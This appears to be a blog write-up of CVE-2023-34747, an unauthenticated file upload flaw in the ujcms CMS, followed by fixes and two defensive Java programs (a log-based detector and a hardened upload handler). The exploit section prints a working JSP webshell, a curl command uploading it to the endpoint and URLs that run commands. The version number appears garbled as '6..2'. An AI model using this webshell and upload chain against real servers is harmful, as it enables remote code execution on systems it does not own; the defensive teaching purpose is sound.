CVE-2023-34747 - How a Simple File Upload Flaw in ujcms 6..2 Lets Attackers Run Arbitrary Code
Content management systems (CMS) make website building easy, but their complex features can introduce serious security problems. One recent case is in ujcms, a popular CMS in China. In version 6..2, there’s a nasty bug (CVE-2023-34747) that lets hackers upload any file—even malicious scripts—using a poorly protected API endpoint. In this post, we’ll break down how this flaw works, demo a simple exploit, and give practical advice for both defenders and pentesters.
What is ujcms?
ujcms is an open-source Java CMS. It's widely used for building dynamic corporate sites, portals, and blogs, focusing on easy article and media management.
The Vulnerability
In ujcms 6..2, the endpoint /api/backend/core/web-file-upload/upload is supposed to let admin users upload media. But, due to missing checks, anyone can upload any type of file. This includes dangerous files like “webshells” (malicious scripts). And because the app saves uploads in a web-accessible directory, uploaded files can run as code if they're accessed by URL.
CVE Identifier: CVE-2023-34747
How Does The Attack Work?
- The /api/backend/core/web-file-upload/upload endpoint does not properly validate file types or protect against unauthorized access.
Step-by-Step Exploit Example
1. Identify The Target
Let’s say the ujcms site is hosted at http://victim.com, and it is running the vulnerable ujcms 6..2.
2. Prepare And Upload A Webshell
Suppose the server is running Tomcat (Java). You could use a basic JSP webshell, like:
```jsp
<%@ page import="java.io.*"%>
<%
    if (request.getParameter("cmd") != null) {
        Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
        OutputStream os = p.getOutputStream();
        InputStream in = p.getInputStream();
        int c;
        while ((c = in.read()) != -1) {
            out.print((char) c);
        }
        in.close();
    }
%>
```
You can use curl to POST your webshell:
```bash
curl -F "file=@shell.jsp" http://victim.com/api/backend/core/web-file-upload/upload
```
3. Find The Uploaded File URL
The API usually responds with the file path, for example:
/uploads/2024/06/shell.jsp
So access it:
http://victim.com/uploads/2024/06/shell.jsp
4. Execute Commands
Now you can visit:
http://victim.com/uploads/2024/06/shell.jsp?cmd=whoami
and the output will reveal the system account running the server.
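From the defender's side, the sequence in steps 2 to 4 leaves a recognisable trace in the web server's access log: a POST to the upload endpoint followed by a request for a server-side script under the upload directory, often from the same client. The following Java program is an added example, not code from the post or from ujcms: it parses constructed common-log-format lines and flags that pattern. The `/uploads/` prefix is taken from the path shown above and the log format is an assumption about the deployment.

```java
import java.util.ArrayList;
import java.util.HashSet;
import java.util.List;
import java.util.Set;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

// Added example, not from the original post: flag access-log entries that match
// the upload-then-execute pattern. The log lines in SAMPLE_LOG are constructed.
public class UploadAbuseDetector {

    // Common/combined log format: client ident user [time] "METHOD path PROTO" status bytes
    private static final Pattern LOG_LINE = Pattern.compile(
        "^(\\S+) \\S+ \\S+ \\[([^\\]]+)\\] \"(\\S+) (\\S+) [^\"]*\" (\\d{3}) \\S+");

    private static final String UPLOAD_ENDPOINT = "/api/backend/core/web-file-upload/upload";

    // A server-side script requested from under the upload directory is the key indicator.
    // The /uploads/ prefix is the path shown in the post and is an assumption about the deployment.
    private static final Pattern SCRIPT_UNDER_UPLOADS = Pattern.compile(
        "^/uploads/.*\\.(jsp|jspx|jspf)(\\?.*)?$", Pattern.CASE_INSENSITIVE);

    // Constructed sample log: one benign image fetch, one full upload-then-execute sequence,
    // and one request for a script that no longer exists (still worth a look)
    static final String[] SAMPLE_LOG = {
        "203.0.113.7 - - [14/Jun/2023:10:01:02 +0000] \"GET /index.html HTTP/1.1\" 200 5120",
        "203.0.113.7 - - [14/Jun/2023:10:01:09 +0000] \"POST /api/backend/core/web-file-upload/upload HTTP/1.1\" 200 87",
        "203.0.113.7 - - [14/Jun/2023:10:01:15 +0000] \"GET /uploads/2024/06/shell.jsp?cmd=whoami HTTP/1.1\" 200 12",
        "198.51.100.4 - - [14/Jun/2023:10:02:00 +0000] \"GET /uploads/2024/06/logo.png HTTP/1.1\" 200 20480",
        "198.51.100.4 - - [14/Jun/2023:10:02:30 +0000] \"GET /uploads/2023/01/old.jspx HTTP/1.1\" 404 0",
    };

    /** One finding per suspicious line; severity is HIGH when the same client uploaded first. */
    public static List<String> findings(String[] lines) {
        List<String> out = new ArrayList<>();
        Set<String> uploaders = new HashSet<>();
        for (String line : lines) {
            Matcher m = LOG_LINE.matcher(line);
            if (!m.find()) continue;
            String client = m.group(1), when = m.group(2), method = m.group(3),
                   path = m.group(4), status = m.group(5);
            if ("POST".equals(method) && path.startsWith(UPLOAD_ENDPOINT) && status.startsWith("2")) {
                uploaders.add(client);
                out.add("MEDIUM " + when + " upload by " + client);
            }
            if (SCRIPT_UNDER_UPLOADS.matcher(path).matches()) {
                String sev = uploaders.contains(client) ? "HIGH" : "MEDIUM";
                out.add(sev + " " + when + " script under uploads requested by " + client
                        + " path=" + path + " status=" + status);
            }
        }
        return out;
    }

    public static void main(String[] args) {
        findings(SAMPLE_LOG).forEach(System.out::println);
    }
}
```

Run with `java UploadAbuseDetector.java` (JDK 11 or later). On the sample log it reports the upload by 203.0.113.7 as MEDIUM, the later `shell.jsp?cmd=whoami` request by the same client as HIGH, and the 404 for `old.jspx` as MEDIUM; the benign `logo.png` fetch produces nothing. In production you would feed real log lines and alert on any HIGH finding, since a successful upload followed by a script request under the upload path is exactly the chain this CVE enables.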
Video Demonstration
For a quick walkthrough, check this similar demonstration (not specific to ujcms):
YouTube: Exploiting File Upload Vulnerabilities
References
- Official Gitee Project - ujcms
- CVE-2023-34747 at MITRE
- Exploit DB Writeup *(similar issue, for learning purposes)*
- Chinese Writeup (漏洞细节分析)
How To Fix It?
- Upgrade: The ujcms team released ujcms 6..3 to patch this bug. Update immediately.
- Filetype Checking: Only allow safe types (.jpg, .png, etc)—never allow script files.
- Move Upload Directory: Store files outside the webroot, or add web server rules to block script execution.
- WAF/IPS: Use a web firewall to catch suspicious uploads.
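The filetype and upload-directory advice above is straightforward to get wrong (checking only the client-supplied name, or storing under the webroot with a predictable name). The following Java class is an added example written for this post, not ujcms's own upload code: it allow-lists image extensions, requires the file's leading bytes to match the declared type, ignores the client's filename when choosing the stored name, and writes to a directory outside the webroot. The storage root, the allow-list and the sample inputs in `main` are all assumptions chosen for the demo.

```java
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import java.util.Arrays;
import java.util.Locale;
import java.util.Map;
import java.util.UUID;

// Added example (not ujcms code): the checks an upload handler should make.
// The client-supplied name is only used to read the declared extension; the
// stored name is generated server-side and the file goes outside the webroot.
public class SafeUploadHandler {

    // Allow-list: extension -> magic byte sequences the content must start with
    private static final Map<String, byte[][]> ALLOWED = Map.of(
        "png", new byte[][] { {(byte) 0x89, 'P', 'N', 'G', 0x0D, 0x0A, 0x1A, 0x0A} },
        "jpg", new byte[][] { {(byte) 0xFF, (byte) 0xD8, (byte) 0xFF} },
        "gif", new byte[][] { "GIF87a".getBytes(StandardCharsets.US_ASCII),
                              "GIF89a".getBytes(StandardCharsets.US_ASCII) }
    );

    private final Path storageRoot;   // assumed to be outside the servlet container's webroot

    public SafeUploadHandler(Path storageRoot) throws IOException {
        this.storageRoot = storageRoot.toAbsolutePath().normalize();
        Files.createDirectories(this.storageRoot);
    }

    /** Returns the canonical extension if the upload is acceptable, otherwise throws. */
    public static String validate(String clientFileName, byte[] content) {
        if (clientFileName == null || clientFileName.indexOf('\0') >= 0) {
            throw new IllegalArgumentException("invalid file name");
        }
        // Keep only the last path segment, then only its final extension
        String base = clientFileName.replace('\\', '/');
        base = base.substring(base.lastIndexOf('/') + 1);
        int dot = base.lastIndexOf('.');
        if (dot < 0 || dot == base.length() - 1) {
            throw new IllegalArgumentException("missing extension");
        }
        String ext = base.substring(dot + 1).toLowerCase(Locale.ROOT);
        if (ext.equals("jpeg")) ext = "jpg";
        byte[][] magics = ALLOWED.get(ext);
        if (magics == null) {
            throw new IllegalArgumentException("extension not allowed: " + ext);
        }
        // The declared type must match the bytes: a JSP renamed to x.png fails here
        for (byte[] magic : magics) {
            if (content.length >= magic.length
                    && Arrays.equals(Arrays.copyOf(content, magic.length), magic)) {
                return ext;
            }
        }
        throw new IllegalArgumentException("content does not match ." + ext);
    }

    /** Stores validated content under a server-generated name and returns the stored path. */
    public Path store(String clientFileName, byte[] content) throws IOException {
        String ext = validate(clientFileName, content);
        Path target = storageRoot.resolve(UUID.randomUUID() + "." + ext).normalize();
        if (!target.startsWith(storageRoot)) {      // defence in depth against traversal
            throw new IllegalArgumentException("path escapes storage root");
        }
        Files.write(target, content);
        return target;
    }

    public static void main(String[] args) throws IOException {
        // Constructed inputs: a minimal PNG header and a tiny JSP body
        SafeUploadHandler h = new SafeUploadHandler(Files.createTempDirectory("uploads-demo"));
        byte[] png = {(byte) 0x89, 'P', 'N', 'G', 0x0D, 0x0A, 0x1A, 0x0A, 0, 0, 0, 13};
        byte[] jsp = "<% out.print(1); %>".getBytes(StandardCharsets.UTF_8);
        System.out.println("stored: " + h.store("logo.png", png));
        for (String bad : new String[] {"shell.jsp", "shell.jsp.png", "../../shell.png"}) {
            try {
                h.store(bad, jsp);
                System.out.println("UNEXPECTED: accepted " + bad);
            } catch (IllegalArgumentException e) {
                System.out.println("rejected " + bad + ": " + e.getMessage());
            }
        }
    }
}
```

Run with `java SafeUploadHandler.java`: `logo.png` with a PNG header is stored under a random name, while `shell.jsp` (extension not on the allow-list), `shell.jsp.png` (bytes do not match `.png`) and `../../shell.png` (same mismatch, and the directory part is discarded anyway) are all rejected. Because the storage root is outside the webroot, anything served back to browsers has to go through an application handler that streams the bytes with an image content type, so even a file that slipped through every check would never be compiled or executed by Tomcat.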
Final Thoughts
File upload bugs are among the most dangerous web vulnerabilities. CVE-2023-34747 in ujcms 6..2 is easy to exploit, and if you are running this CMS, you need to patch NOW. Remember, never trust user input—especially when files are involved.
Stay safe!
*If you found this post useful, share it with friends and colleagues, and check out the official patch notes for further info.*
Timeline
Published on: 06/14/2023 14:15:00 UTC
Last modified on: 06/22/2023 14:20:00 UTC